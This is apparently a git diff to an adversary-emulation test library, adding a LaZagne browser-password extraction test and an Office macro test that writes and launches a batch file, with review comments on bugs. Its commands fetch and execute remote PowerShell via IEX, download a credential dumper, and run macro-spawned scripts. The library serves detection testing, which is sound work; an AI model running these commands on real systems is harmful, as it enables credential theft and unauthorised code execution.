diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index dbe30ffd..3126ec14 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -184,6 +184,7 @@ credential-access,T1552.001,Credentials In Files,3,Extracting passwords with fin
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
+credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
@@ -631,6 +632,7 @@ execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4
execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
+execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 6e04db29..def25897 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -438,6 +438,7 @@ execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4
execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
+execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -477,6 +478,7 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
+credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index a26388e2..e328af02 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -383,6 +383,7 @@
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
+ - Atomic Test #3: LaZagne - Credentials from Browser [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
@@ -1088,6 +1089,7 @@
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
+ - Atomic Test #5: Office launching .bat file from AppData [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d4e1343a..fd9c685a 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -835,6 +835,7 @@
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
+ - Atomic Test #5: Office launching .bat file from AppData [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -915,6 +916,7 @@
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
+ - Atomic Test #3: LaZagne - Credentials from Browser [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8f2af952..b9f9becc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -17834,6 +17834,34 @@ credential-access:
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
name: sh
+ - name: LaZagne - Credentials from Browser
+ auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014
+ description: "The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne)
+ to extract passwords from browsers on the Windows operating system.\nLaZagne
+ is an open source application used to retrieve passwords stored on a local
+ computer. \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ lazagne_path:
+ description: Path to LaZagne
+ type: Path
+ default: PathToAtomicsFolder\T1555.003\bin\LaZagne.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+
+'
+ prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "#{lazagne_path} browsers\n"
T1552.002:
technique:
external_references:
@@ -42718,7 +42746,7 @@ discovery:
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
- for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
name: command_prompt
- name: System Owner/User Discovery
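Review bot: The changed line redirects `echo %j` into computers.txt, but `%j` is still the second `qwinsta` token, which the next line's loop and the original `usernames.txt` target both treat as a user name, so computers.txt appears to be fed user names and the follow-up `qwinsta /server:%n` is run against them; this is inferred from the `tokens=1,2` layout and should be confirmed against real output. Both lines also use `>`, which overwrites the file on every loop iteration, so only the last match survives; `>>` (or creating the file once before the loop) looks like the intent. The same line is changed in the T1033.md hunk. The enclosing command block starts before the hunk.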
@@ -44278,8 +44306,7 @@ execution:
description: |
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
- This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+ This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
supported_platforms:
@@ -44296,30 +44323,34 @@ execution:
type: String
default: Word
ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+ description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+ Default latest version.
type: String
- default: '16.0'
+ default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+ -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+ | Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
'
- prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
- { exit 0 } else { exit 1 }
-
-'
+ prereq_command: |
+ $ms_office_version = #{ms_office_version}
+ If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ $ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
- Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+ Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ $ms_office_version = #{ms_office_version}
+ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
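Review bot: The new `$ms_office_version = #{ms_office_version}` in `prereq_command`, `command` and `cleanup_command` substitutes the argument as PowerShell code rather than as a value, so a caller who overrides the default with a bare `16.0` gets a [double] that interpolates into the registry path as `16`, while the default pipeline yields a [decimal] that keeps `16.0`; if that reading of PowerShell's numeric formatting is right, the prereq check silently fails for overridden values. Normalising once would make both forms work, e.g. `$ms_office_version = '{0:0.0}' -f [decimal](#{ms_office_version})`. The same assignment pattern is used in the two following index.yaml hunks for "OSTap Payload Download", "OSTAP JS version" and "Office launching .bat file from AppData", and in the T1204.002.md hunks. The `description` could also say that the argument is evaluated as an expression, which is why the default is a pipeline and not a literal. The enclosing atomic test entry starts before the hunk.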
@@ -44358,37 +44389,38 @@ execution:
type: String
default: Word
ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+ description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+ Default latest version.
type: String
- default: '16.0'
+ default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+ -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+ | Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
'
- prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
- { exit 0 } else { exit 1 }
-
-'
+ prereq_command: |
+ $ms_office_version = #{ms_office_version}
+ If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ $ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
- Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
- cleanup_command: 'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
- -Name ''AccessVBOM'' -ErrorAction Ignore
-
-'
+ Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+ cleanup_command: |
+ $ms_office_version = #{ms_office_version}
+ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
name: powershell
- name: OSTAP JS version
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
description: |
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
-
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
@@ -44402,30 +44434,80 @@ execution:
type: String
default: Word
ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+ description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+ Default latest version.
type: String
- default: '16.0'
+ default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+ -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+ | Sort-Object -desc)
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
'
- prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
- { exit 0 } else { exit 1 }
-
-'
+ prereq_command: |
+ $ms_office_version = #{ms_office_version}
+ If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ $ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
- Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+ Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
+ $ms_office_version = #{ms_office_version}
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ name: powershell
+ - name: Office launching .bat file from AppData
+ auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
+ description: Microsoft Office creating then launching a .bat script from an
+ AppData directory. The .bat file launches calc.exe when opened.
+ supported_platforms:
+ - windows
+ input_arguments:
+ bat_path:
+ description: Path to malicious .bat file
+ type: String
+ default: $env:temp+"\art1204.bat"
+ ms_office_version:
+ description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+ Default latest version.
+ type: string
+ default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+ -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+ | Sort-Object -desc)[0]
+ ms_product:
+ description: Maldoc application Word or Excel
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Test Requires MS Office to be installed and have been run previously.
+ Run -GetPrereqs to run msword and build dependant registry keys
+
+'
+ prereq_command: |
+ $ms_office_version = #{ms_office_version}
+ If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+ get_prereq_command: |
+ $msword = New-Object -ComObject word.application
+ Stop-Process -Name WINWORD
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ $ms_office_version = #{ms_office_version}
+ $bat_path = #{bat_path}
+ $macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+ Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+ cleanup_command: |
+ $ms_office_version = #{ms_office_version}
+ if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
+ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
name: powershell
T1204.001:
technique:
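Review bot: The `ms_office_version` default for "OSTAP JS version" ends in `| Sort-Object -desc)` without the trailing `[0]` that the other three tests use, so on a machine with more than one Office version key `$ms_office_version` is an array and `Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version` interpolates it space-joined and fails; the generated T1204.002.md table mirrors the same default. Append `[0]` to match the sibling tests. In the new "Office launching .bat file from AppData" entry, `type: string` differs from the `String` used by every other argument, and the VBA `Shell("cmd.exe /c $bat_path ", vbNormalFocus)` leaves the path unquoted, so a temp directory containing a space would not launch as intended — presumably fine for the default `$env:temp` but worth a comment on `bat_path`.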
diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index 01000298..d8bf9166 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -42,7 +42,7 @@ quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
-for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
```
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index 4f980eca..69c4670c 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -16,14 +16,15 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #4 - OSTAP JS version](#atomic-test-4---ostap-js-version)
+- [Atomic Test #5 - Office launching .bat file from AppData](#atomic-test-5---office-launching-bat-file-from-appdata)
+
## Atomic Test #1 - OSTap Style Macro Execution
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
-This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
@@ -37,7 +38,7 @@ References:
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -45,14 +46,16 @@ References:
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
```
#### Cleanup Commands:
```powershell
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+$ms_office_version = #{ms_office_version}
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
@@ -61,7 +64,8 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Check Prereq Commands:
```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -123,7 +127,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -131,13 +135,15 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
```
#### Cleanup Commands:
```powershell
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+$ms_office_version = #{ms_office_version}
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
@@ -146,7 +152,8 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Check Prereq Commands:
```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -162,7 +169,6 @@ Stop-Process -Name WINWORD
## Atomic Test #4 - OSTAP JS version
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
-
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
**Supported Platforms:** Windows
@@ -175,7 +181,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
|------|-------------|------|---------------|
| jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)|
#### Attack Commands: Run with `powershell`!
@@ -183,14 +189,16 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
```
#### Cleanup Commands:
```powershell
+$ms_office_version = #{ms_office_version}
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
@@ -199,7 +207,63 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Check Prereq Commands:
```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+$msword = New-Object -ComObject word.application
+Stop-Process -Name WINWORD
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Office launching .bat file from AppData
+Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| bat_path | Path to malicious .bat file | String | $env:temp+"\art1204.bat"|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | string | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
+| ms_product | Maldoc application Word or Excel | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
+$bat_path = #{bat_path}
+$macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+```
